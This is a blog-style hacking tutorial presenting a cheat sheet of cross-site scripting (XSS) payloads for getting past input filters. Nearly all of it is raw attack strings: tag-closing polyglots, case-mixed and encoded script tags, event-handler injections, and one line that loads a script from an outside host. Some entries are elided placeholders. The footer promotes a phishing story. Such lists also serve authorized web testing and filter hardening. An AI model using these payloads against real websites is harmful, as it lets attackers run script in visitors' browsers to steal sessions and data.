Hacking Tutorials XSS

XSS Filter Bypass Cheat Sheet

As I promised here is the ultimate cheat sheet for bypassing XSS filters.
If you don’t understand what I am saying than you should read these articles:

1. Cross Site Scripting (XSS) : Getting Started
2. Bypassing XSS Filters : Part 1
3. Bypassing XSS Filters : Part 2

Quick XSS Payloads

You can use these payloads when you want to quickly check for XSS in a webpge.

Filter Check
It will check which characters are being filter. It also checks if <script>
tag is blocked or not.

/"'`\<><script>:;

XSS Tester: Alert XSS Statment
This payload will try to close tags and bypass basic filters to execute an alert box.

';</script>">'><SCrIPT>alert(String.fromCharCode(88,83,83))</scRipt>

XSS Polyglot 1
It is my custom payload which tries to bypass basic filters by closing tags and using different types of payloads.

';'>"><marquee>test</marquee><plaintext/onmouseover=prompt(test)>
<img src="https://teamultimate.in/wp-content/uploads/2017/03/slide-main.png">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

XSS Polyglot 2

//'/<@/></script></div></script>--><select */onclick=alert()><o>1<o>2')//"<!--

XSS Polyglot 3

<svg onload="void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d
%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'; "></svg>

List Of Payloads

Without quotes and semicolons
Use when quotes and semicolons are being filtered.

<IMG SRC=javascript:alert('XSS')>

Without any quotes

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

Defeats tag checking

<<SCRIPT>alert("test");//<</SCRIPT>

Without closing tag

<SCRIPT SRC=https://xss.rocks/xss.js?< B >

Using body tag

<BODY ONLOAD=alert('XSS')>

Using video tag

<video src=_ onloadstart="alert(1)">

Using table tag

<TABLE BACKGROUND="javascript:alert('XSS')">

Closing script tag

</script><script>alert(1)</script>

When script tag is being filtered

</script><script>alert(1)</script>

Triple URL Encoding

<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>

JS-F**CK Payload

<img/src="x"/onerror="[boom]">

Using On wheel event with body tag

<body style="height:1000px" onwheel="[DATA]">

Using (&NewLine;) and (&NewTab;) with <a> tag

<a href="j[785 bytes of (&NewLine;&Tab;)]avascript:alert(1);">XSS</a>

Using OnDrag with Unicode Encoding

--><d/ /ondrag=co\u006efir\u006d(2)>hello.

Spaces and meta chars before the JavaScript in images for XSS

<IMG SRC=" &#14;  javascript:alert('XSS');">

Here are some other payloads:

"><img src=x onerror=prompt(1)>
"><svg/onload=prompt(1)>
"><iframe/src=javascript:prompt(1)>
"><h1 onclick=prompt(1)>Clickme</h1>
"><a href=javascript:prompt(1)>Clickme</a>
"><a href="javascript:confirm%28 1%29">Clickme</a>
"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>
"><textarea autofocus onfocus=prompt(1)>
"><a/href=javascript&colon;co\u006efir\u006d&#40;&quot;1&quot;&#41;>clickme</a>
"><script>co\u006efir\u006d`1`</script>
"><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
"><img src=x onerror=co\u006efir\u006d`1`>
"><svg/onload=co\u006efir\u006d`1`>
"><iframe/src=javascript:co\u006efir\u006d%28 1%29>
"><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
"><a href=javascript:prompt%28 1%29>Clickme</a>
"><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>
"><textarea autofocus onfocus=co\u006efir\u006d(1)>
"><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
"><img/src=x%0Aonerror=prompt`1`>
"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">
"><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>

The list ends here but I will add more payloads later.
Thanks for reading.
Also Read: How I Hacked Someone With Phishing Who Was Aware About Phishing


Subscribe Now

Subscribe for free and get latest articles delivered right into your inbox.

Thank you for subscribing.

Something went wrong.

Categories

>-----ADVERTISEMENT-----<